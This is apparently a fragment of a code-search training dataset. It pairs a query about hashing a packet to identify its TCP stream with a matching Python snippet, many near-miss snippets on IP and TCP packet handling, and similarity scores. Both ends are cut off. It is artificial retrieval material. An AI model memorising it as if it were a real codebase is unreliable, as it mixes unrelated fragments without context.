local_ip_range = 0\n\n # chunk size can be adjusted if needed\n self.chunk_size = 200\n\n self.current_chunk = 1\n if local_ip_range < self.chunk_size:\n # there are not more than chunk_size unused IP Addresses to begin with\n self.chunks = 0\n self.chunk_remainder = local_ip_range\n else:\n # determine how many chunks of (chunk_size) Addresses there are and the save the remainder\n self.chunks = local_ip_range // self.chunk_size\n self.chunk_remainder = local_ip_range % self.chunk_size\n\n # add the first chunk of IP Addresses\n self.unused_local_ips = set()\n self.expand_unused_local_ips()\n\n # save the gathered information for efficient later use\n self.external_ips = frozenset(external_ips)\n self.remaining_external_ips = external_ips\n self.max_uncertain_local_ip = self.max_local_ip\n self.local_ips = frozenset(local_ips)\n # print(\"External IPS: \" + str(external_ips))\n # print(\"LOCAL IPS: \" + str(local_ips))\n self.remaining_local_ips = local_ips\n self.uncertain_local_ips = set()", "def get_localhost_ip():\n ifs = netifaces.interfaces()\n for i in ifs:\n try:\n addr = netifaces.ifaddresses(i)[netifaces.AF_INET][0]['addr']\n except KeyError:\n pass\n\n if addr == '127.0.0.1':\n continue\n\n yield addr", "def local_bind_hosts(self):\n self._check_is_started()\n return [_server.local_host for _server in self._server_list if\n _server.local_host is not None]", "async def bindip_choices(self):\n return {\n d['address']: d['address'] for d in await self.middleware.call(\n 'interface.ip_in_use', {'static': True, 'any': True}\n )\n }", "def discovered_ips(self) -> Sequence[str]:\n return pulumi.get(self, \"discovered_ips\")", "def get_addrs(self):\n # TODO check if server is listening\n return self.multiaddrs", "def ip_addresses(self) -> pulumi.Output[Sequence['outputs.IpMappingResponse']]:\n return pulumi.get(self, \"ip_addresses\")", "def get_local_host_ip(self) -> str:", "def get_local_ip(self, system):\n if system == \"Linux\":\n # This is a bit ugly but it works\n ips = check_output(['hostname', '--all-ip-addresses']).decode(\"utf-8\")\n return ips.split(\" \")[0]\n else:\n return socket.gethostbyname(socket.gethostname())", "def set_ip_adresses(self):\n # unfold a config tree for the current suffix, if any\n for interface, details in self.interfaces.items():\n for k, v in details.items():\n if k == 'address':\n ip, prefix = address_to_ip_prefix(v)\n self.interfaces[interface]['ip_address'] = ip\n self.interfaces[interface]['ip_prefix'] = prefix\n break\n if interface == 'wan':\n self.ip_address = ip\n if interface == 'ha_sync':\n self.ha_sync_ip_address = ip", "def private_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"private_ip_addresses\")", "def grab_ips(self):\n parse_log = open(self.xmlrpc_log, 'r')\n for entry in parse_log:\n just_ip = entry.split()\n ip = just_ip[0]\n self.ip_list.append(ip)\n ip_set = set(self.ip_list)\n ips = list(ip_set)\n return ips" ]
[ "0.73083735", "0.72061265", "0.704093", "0.6923851", "0.6890017", "0.6762811", "0.6715329", "0.67115986", "0.66833586", "0.6657584", "0.66189605", "0.66133195", "0.66041005", "0.6584781", "0.6563698", "0.6518723", "0.64804894", "0.647476", "0.645703", "0.63811326", "0.6353452", "0.63502944", "0.6347195", "0.63224024", "0.6263298", "0.6226356", "0.62138575", "0.6151456", "0.61133534", "0.61025894" ]
0.74796903
0
Sorts an iterable of packets and removes the duplicates
def iter_packets(iterable): prev = None for i in sorted(iterable, key=attrgetter('seq')): if prev is None or prev.seq != i.seq: prev = i yield i
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sort_grouped_packets(self, grouped_packets):\n for group in grouped_packets:\n group.sort(key=lambda x: x.time, reverse=False)\n return grouped_packets", "def insertOrderedPacket(self, packet:Rudp.Packet, packets:list) -> list:\n i = 0\n for i in range(len(packets)):\n if packets[i].seq == packet.seq:\n print(\"Received Duplicated Packet, dropped: \", packet.seq)\n return packets\n if packets[i].seq > packet.seq:\n break\n\n if packet.seq <= self.ack:\n print(\"Packet Seq: \", packet.seq, \" Dropped\")\n return packets\n else:\n result = packets[:i] + [packet] + packets[i:]\n return result", "def sort_4(l):\n l = list(set(l))\n l.sort()", "def de_dup_and_sort(input):\r\n if input== None:\r\n return None\r\n input = list(input)\r\n input = remove_duplicates(input)\r\n input.sort()\r\n return input", "def cleanse(packets):\n pkts = []\n retran = False\n lost = False\n for pkt in packets:\n if len(pkt['data']) > 0:\n # If first packet just add and move on\n if len(pkts) == 0:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is = to this one add this pkt\n elif pkt['tcp']['seq_num'] == next_seq:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is > than this one there is a \n # Retransmission\n elif pkt['tcp']['seq_num'] < next_seq:\n retran = True\n elif pkt['tcp']['seq_num'] > next_seq:\n lost = True\n else:\n pass\n\n return pkts, retran, lost", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def test_input_order_irrelevant(self):\n sorted_strings = ['1532-44349', '1534-44658', '1536-44582', '1536-44935', '1538-44874', '1538-44920']\n mutable_copy = list(sorted_strings)\n for i in range(10000):\n random.shuffle(mutable_copy)\n assert natsort(mutable_copy) == sorted_strings", "def natsort(lst):\n lst.sort(key=natsort_key)", "def remove_sorted_duplicates(self):\n cur = self.head\n while cur is not None and cur.next is not None:\n if cur.next.data == cur.data:\n cur.next = cur.next.next\n else:\n cur = cur.next\n return self.head", "def natsorted(lst):\n return sorted(lst, key=natsort_key)", "def sort_by_ip(unsorted):\n by_ip = {}\n\n for k, v in unsorted.items():\n for ip in v:\n if ip in by_ip and k not in by_ip[ip]:\n by_ip[ip].append(k)\n else:\n by_ip[ip] = [k]\n\n return OrderedDict(sorted(by_ip.items()))", "def sort(self):\n\t\tself.servers = sorted(self.servers, key=lambda s: s.load)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.distance_class)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.country == self.locale_info.country, reverse=True)", "def sort(self):\n # Sort here actually uses the tuple comparison we defined in the Card class\n self.cards.sort()", "def bogosort(to_sort):\n # Be sure to sort the list at each pass in the while loop to make it extra\n # inefficient!\n while sorted(to_sort) != to_sort:\n shuffle(to_sort)", "def _toposort(edges):\r\n incoming_edges = reverse_dict(edges)\r\n incoming_edges = dict((k, set(val)) for k, val in incoming_edges.items())\r\n S = set((v for v in edges if v not in incoming_edges))\r\n L = []\r\n\r\n while S:\r\n n = S.pop()\r\n L.append(n)\r\n for m in edges.get(n, ()):\r\n assert n in incoming_edges[m]\r\n incoming_edges[m].remove(n)\r\n if not incoming_edges[m]:\r\n S.add(m)\r\n if any(incoming_edges.get(v, None) for v in edges):\r\n raise ValueError(\"Input has cycles\")\r\n return L", "def remove_with_sort(to_remove):\n slow = to_remove.head\n runner = to_remove.head\n\n while slow:\n while runner:\n if runner.next_node:\n if slow.value == runner.next_node.value:\n runner.next_node = runner.next_node.next_node\n runner = runner.next_node\n slow = slow.next_node\n try:\n runner = slow.next_node\n except:\n pass", "def sort(self):\n self.cards.sort()", "def sort(self):\n self.cards.sort()", "def sort(items):\n heapq.heapify(items)\n items[:] = [heapq.heappop(items) for i in range(len(items))]", "def _unique_sorted(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]", "def eliminate_duplicates(iterable):\n class NoElement: pass\n\n prev_elem = NoElement\n for elem in sorted(iterable):\n if prev_elem is NoElement:\n prev_elem = elem\n yield elem\n continue\n\n if prev_elem != elem:\n prev_elem = elem\n yield elem", "def test_sort_outputs_0a6a357e(self):\n outputs = bip69.get_outputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_outputs = bip69.sort_outputs(outputs)\n self.assertEqual(bip69_outputs[0], (('76a9144a5fba237213a062f6f57978f79'\n '6390bdcf8d01588ac'), 400057456))\n self.assertEqual(bip69_outputs[1], (('76a9145be32612930b8323add2212a4ec'\n '03c1562084f8488ac'), 40000000000))", "def sort(self):\n self.deckcards.sort()", "def _convert_packets_into_batch(self, packets):\n def filter_non_bootstrap_nodes():\n for candidate, packet in packets:\n cid = packet[2:22]\n\n if not cid in self._communities and False: # candidate.sock_addr[0] in self._non_autoload:\n if __debug__:\n logger.warn(\"drop a %d byte packet (received from non-autoload node) from %s\", len(packet), candidate)\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:from bootstrap node for unloaded community\")\n continue\n\n yield candidate, packet\n\n packets = list(filter_non_bootstrap_nodes())\n if packets:\n return super(TrackerDispersy, self)._convert_packets_into_batch(packets)\n\n else:\n return []", "def sort(self):\n srt = self.sources()\n stack = list(srt) # makes a copy\n while stack:\n node = stack.pop(0)\n if (not node.isSink()):\n # if a child is not in srt, and all of its parents are in srt,\n # then add it. Must have all parents to get true topo sort.\n newChildren = filter(lambda x: len(set(x.parents()) - set(srt))==0,\n [child for child in node.children() if child not in srt])\n stack.extend(newChildren)\n srt.extend(newChildren)\n return srt", "def test__remove_duplicates(self):\n\n result = deduped_list\n expected = [\n 'Fred',\n 'Dave',\n 'Sarah',\n 'John',\n 'Matthew',\n 'Joanna',\n 'Marjorie',\n 'Anna',\n 'Tony',\n 'Sam',\n 'Eric',\n 'Susan',\n 'Arthur',\n ]\n\n self.assertListEqual(sorted(result), sorted(expected))", "def sort(\n tuples: Collection[Tuple[_T, _T]],\n allitems: Collection[_T],\n deterministic_order: bool = True,\n) -> Iterator[_T]:\n\n for set_ in sort_as_subsets(tuples, allitems):\n yield from set_", "def short_bubble_sort(integer_list):\n exchanged = True\n for passnum in range(len(integer_list), 1, -1):\n exchanged = False\n for i in range(passnum-1):\n if integer_list[i] > integer_list[i+1]:\n exchanged = True\n integer_list[i], integer_list[i+1] = integer_list[i+1], integer_list[i]\n if not exchanged:\n break\n return integer_list", "def natsort(lst: List[str]) -> None:\n lst.sort(key=natsort_key)", "def test_sort_all_equal():\n assert bubble_sort([1, 1, 1, 3, 4, 10, 2, 3]) == [1, 1, 1, 2, 3, 3, 4, 10]" ]
[ "0.6647256", "0.61278707", "0.60170823", "0.5986823", "0.596562", "0.5906093", "0.5628137", "0.5617985", "0.560249", "0.5601702", "0.5557772", "0.5519489", "0.55179644", "0.55005574", "0.5492273", "0.54918206", "0.5472187", "0.5472187", "0.54687566", "0.543962", "0.54305553", "0.53969437", "0.5389872", "0.537103", "0.53452706", "0.53303266", "0.532059", "0.53150225", "0.53019935", "0.52754885" ]
0.6355191
1
Hashes a packet to determine the tcp stream it is part of
def hash_packet(eth, outbound=False): ip = eth.data tcp = ip.data return '%s:%i' % (ipaddr_string(ip.dst if outbound else ip.src), tcp.sport if outbound else tcp.dport )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def hash_packet(packet):\n if packet.proto == 6:\n #*** Is TCP:\n packet_tuple = (packet.ip_src,\n packet.ip_dst,\n packet.proto,\n packet.tp_src,\n packet.tp_dst,\n packet.tp_seq_src,\n packet.tp_seq_dst)\n else:\n #*** Isn't a flow, so make hash unique to packet by including\n #*** the DPID and timestamp in the hash:\n packet_tuple = (packet.eth_src,\n packet.eth_dst,\n packet.eth_type,\n packet.dpid,\n packet.timestamp)\n return hash_tuple(packet_tuple)", "def spoof_packet(packet):", "def send_packet(hash_str, size, s, d, count_dict, count_dict1, mark_dict, \n threshold, mark_group, seeds, polys, min_len, \n flow_paths, cflow_dict, app_link_dict, app_link_flow_dict, switch_nodes, table, select_dict, drop_id=0, r_threshold=0.0, black_hole='sh41', test_hop='',\n add_byte_dict=OrderedDict({}), w_key=''):\n pkt_mark = \"0\"\n if len(select_dict) < 1000000:\n pkt_mark = mf.mark_random(p=1.0)\n hash_str += pkt_mark\n if hash_str not in mark_dict:\n mark_dict[hash_str] = 0\n mark_dict[hash_str] += 1\n min_len = next_hop_rand_mark(\n s, 'h1', s, d, hash_str, size, table, seeds, polys, min_len, \n flow_paths, cflow_dict, app_link_dict, app_link_flow_dict, select_dict,\n drop_id=drop_id, r_threshold=r_threshold, black_hole=black_hole, \n test_hop=test_hop, add_byte_dict=add_byte_dict, w_key=w_key\n )\n return min_len", "def readPacket(stream):\n header = readPacketHeader(stream)\n md5 = stream.read(16)\n data = stream.read(header.length)\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! (expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def tcp_shasum_calc(src: bytes, dst: bytes, proto: int, payload: bytes) -> bytes:\n _sum = struct.pack(\">4s4sxBH\", src, dst, proto, len(payload))\n if isinstance(payload, str):\n payload = payload.encode()\n return hash_digest(_sum + payload)", "def tcp_fix_checksum(pkt: dpkt.ethernet.Ethernet) -> dpkt.ethernet.Ethernet:\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip = pkt.data\n elif isinstance(pkt, dpkt.ip.IP):\n ip = pkt\n else:\n return None\n tcp = ip.data\n tcp.sum = 0\n payload = bytes(tcp)\n _sum = dpkt.struct.pack('>4s4sxBH', ip.src, ip.dst, ip.p, len(payload))\n _sum = dpkt.in_cksum_add(0, _sum)\n _sum = dpkt.in_cksum_add(_sum, payload)\n tcp.sum = dpkt.in_cksum_done(_sum)\n ip.data = tcp\n ip.sum = 0\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip.sum = dpkt.in_cksum(ip.pack_hdr() + bytes(ip.opts))\n pkt.data = ip\n return pkt", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def tcp_reassembly(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n bufid=(\n ipaddress.ip_address(ip.src), # source IP address\n ipaddress.ip_address(ip.dst), # destination IP address\n tcp.sport, # source port\n tcp.dport, # destination port\n ),\n num=count, # original packet range number\n ack=tcp.ack, # acknowledgement\n dsn=tcp.seq, # data sequence number\n syn=bool(tcp.flags.S), # synchronise flag\n fin=bool(tcp.flags.F), # finish flag\n rst=bool(tcp.flags.R), # reset connection flag\n payload=bytearray(bytes(tcp.payload)), # raw bytearray type payload\n )\n raw_len = len(tcp.payload) # payload length, header excludes\n data['first'] = tcp.seq # this sequence number\n data['last'] = tcp.seq + raw_len # next (wanted) sequence number\n data['len'] = raw_len # payload length, header excludes\n return True, data\n return False, None", "def makePacket(bytes):\n header = makePacketHeader(bytes[0:8])\n md5 = bytes[8:24]\n data = bytes[24:24 + header.length]\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! (expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def check_packet(self, header, string):\n\n string = string[0:11] + string[75:]\n gen_chksum = hashlib.sha256(string.encode()).hexdigest()\n try:\n if header[\"checksum\"] == gen_chksum:\n return True\n else:\n return False\n except KeyError:\n return False", "def hash_flow(flow_5_tuple):\n ip_A = flow_5_tuple[0]\n ip_B = flow_5_tuple[1]\n tp_src = flow_5_tuple[2]\n tp_dst = flow_5_tuple[3]\n proto = flow_5_tuple[4]\n if proto == 6:\n #*** Is a TCP flow:\n if ip_A > ip_B:\n direction = 1\n elif ip_B > ip_A:\n direction = 2\n elif tp_src > tp_dst:\n direction = 1\n elif tp_dst > tp_src:\n direction = 2\n else:\n direction = 1\n else:\n #*** Isn't a flow, so arbitrarily set direction as 1:\n direction = 1\n if direction == 1:\n flow_tuple = (ip_A, ip_B, tp_src, tp_dst, proto)\n else:\n #*** Flip direction:\n flow_tuple = (ip_B, ip_A, tp_dst, tp_src, proto)\n return hash_tuple(flow_tuple)", "def _compute_checksum(packet):\n # checksum is the sum of the bytes\n # from device id to the end of the data\n # mod (%) 256 and bit negated (~) (1's compliment)\n # and (&) with 0xFF to make sure it is a byte.\n return ~(sum(packet[2:]) % 0x100) & 0xFF", "def __process_ethframe(self, eth_header: bytes) -> Dict[str, Any]:\n eth = struct.unpack('!6s6sH', eth_header)\n eth_protocol = socket.ntohs(eth[2])\n\n return {\n 'header_length': Sniffer.ETH_HEADER_LENGTH,\n 'protocol': eth_protocol,\n }", "def make_packet(self, string):\n\n string = string[:2] + \"checksum:,\" + string[2:]\n chksum = hashlib.sha256(string.encode()).hexdigest()\n string = string[:11] + chksum + string[11:]\n return string", "def count_md5hash_bytes(byte_flow):\n hash_md5 = hashlib.md5()\n hash_md5.update(byte_flow)\n return hash_md5.hexdigest()", "def ethernet_frame(packet):\n dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', packet[:14])\n return get_mac_addr(dest_mac), get_mac_addr(src_mac), socket.htons(proto), packet[14:]", "def trackerhash(type):\n t_hash = urandom(20)\n if type == 'udp':\n return t_hash\n if type == 'http':\n return quote_from_bytes(t_hash)", "def readPacketHeader(stream):\n return makePacketHeader(stream.read(8))", "def get_tcp_packet_fingerprint_info(self, packet, relative_time):\n\n size = self.get_packet_size(packet, TCP)\n time = packet.time - relative_time\n direction = self.get_packet_direction(packet)\n return str(time) + '\\t' + str(direction*size)", "def get_socket_hash(socket):\r\n return hash(socket.id_data.name + socket.node.name + socket.identifier)", "def process_message(msg):\r\n print(\"received \")\r\n global bytes_in\r\n if len(msg) == 200: # is header or end\r\n print(\"found header\")\r\n msg_in = msg.decode(\"utf-8\")\r\n msg_in = msg_in.split(\",,\")\r\n print(msg_in)\r\n if msg_in[0] == \"end\": # is it really last packet?\r\n in_hash_final = in_hash_md5.hexdigest()\r\n if in_hash_final == msg_in[2]:\r\n print(\"File copied OK -valid hash \", in_hash_final)\r\n return -1\r\n else:\r\n print(\"Bad file receive \", in_hash_final)\r\n return False\r\n else:\r\n if msg_in[0] != \"header\":\r\n in_hash_md5.update(msg)\r\n return True\r\n else:\r\n return False\r\n else:\r\n bytes_in = bytes_in + len(msg)\r\n in_hash_md5.update(msg)\r\n print(\"found data bytes= \", bytes_in)\r\n return True", "def __process_tcpframe(self, tcp_header: bytes) -> Dict[str, Any]:\n tcph = struct.unpack('!HHLLBBHHH', tcp_header)\n\n # Normal stuff\n source_port = tcph[0]\n dest_port = tcph[1]\n sequence = tcph[2]\n acknowledgement = tcph[3]\n tcphl = (tcph[4] >> 4) * 4\n\n # TCP flags\n flags = ((tcph[4] & 1) << 8) | tcph[5]\n\n return {\n 'header_length': tcphl,\n 'source_port': source_port,\n 'destination_port': dest_port,\n 'sequence': sequence,\n 'acknowledgement': acknowledgement,\n 'flags': self.__process_flags(flags),\n }", "def frame_packet(message):\n if message in one_char_packets:\n return message\n return \"$%s#%02x\" % (message, checksum(message))", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def makePacketHeader(bytes):\n id = struct.unpack('!H', bytes[0:2])[0]\n length = struct.unpack('!H', bytes[2:4])[0]\n packet_count = struct.unpack('!I',bytes[4:8])[0]\n return PacketHeader(id, length, packet_count)", "def get_tcp_packet(self, sock):\n\n # the first? byte indicates the fragment status (last fragament==1?)\n # after that goes the packet size\n pkt = ''\n try:\n while True:\n psize = ''\n while True:\n psize += sock.recv(1)\n if len(psize) == 4:\n break\n p0 = psize[0]\n psize = '\\0' + psize[1:4] # remove packet number\n psize = int(struct.unpack('!I', psize)[0])\n # read actual pkt\n while True:\n pkt += sock.recv(1)\n if len(pkt) == psize:\n break\n if binascii.hexlify(p0) == '80':\n break\n except socket.timeout:\n pass\n return pkt", "def __parse(self, packet: bytes) -> TSPacket.TSPacket:\n p = TSPacket.TSPacket()\n try:\n b1, b23, b4 = struct.unpack('>BHB', packet[0:4])\n # 4-byte Transport Stream Header\n p.tsh_sync = b1\n p.tsh_tei = (b23 & 32768) >> 15\n p.tsh_pusi = (b23 & 16384) >> 14\n p.tsh_tp = (b23 & 8192) >> 13\n p.tsh_pid = b23 & 8191\n p.tsh_tsc = (b4 & 192) >> 6\n p.tsh_afc = (b4 & 48) >> 4\n p.tsh_cc = b4 & 15\n # Adaptation Field\n if p.tsh_afc == 2 or p.tsh_afc == 3:\n p.af_length = packet[4] # b1\n if p.af_length != 0:\n b2 = packet[5]\n p.af_disc = (b2 & 128) >> 7\n p.af_random = (b2 & 64) >> 6\n p.af_espi = (b2 & 32) >> 5\n p.af_pcrf = (b2 & 16) >> 4\n p.af_opcrf = (b2 & 8) >> 3\n p.af_spf = (b2 & 4) >> 2\n p.af_tpdf = (b2 & 2) >> 1\n p.af_afef = b2 & 1\n pos = 6\n if p.af_pcrf:\n # p.af_pcr = packet[6:12]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_pcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_opcrf:\n # p.af_opcr = packet[pos:(pos+6)]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_opcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_spf:\n p.af_sc = packet[pos]\n pos += 1\n if p.af_tpdf:\n l = packet[pos]\n pos += 1\n p.af_tpd = packet[pos:(pos+l)]\n pos += l\n if p.af_afef:\n l = packet[pos]\n pos += 1\n p.af_ae = packet[pos:(pos+l)]\n # Calculate payload start byte\n if p.tsh_afc == 1:\n p.payload = 4\n elif p.tsh_afc == 3:\n p.payload = 5 + p.af_length\n return p\n except Exception as err:\n logging.warning('TS packet parsing error:' + str(err))\n return None", "def sniffing():\n sniff(store=False, prn=lambda p: threading.Thread(target=sendHash, args=(p,)).start(), iface=IFACE)", "def tcp_checksum_calc(src: bytes, dst: 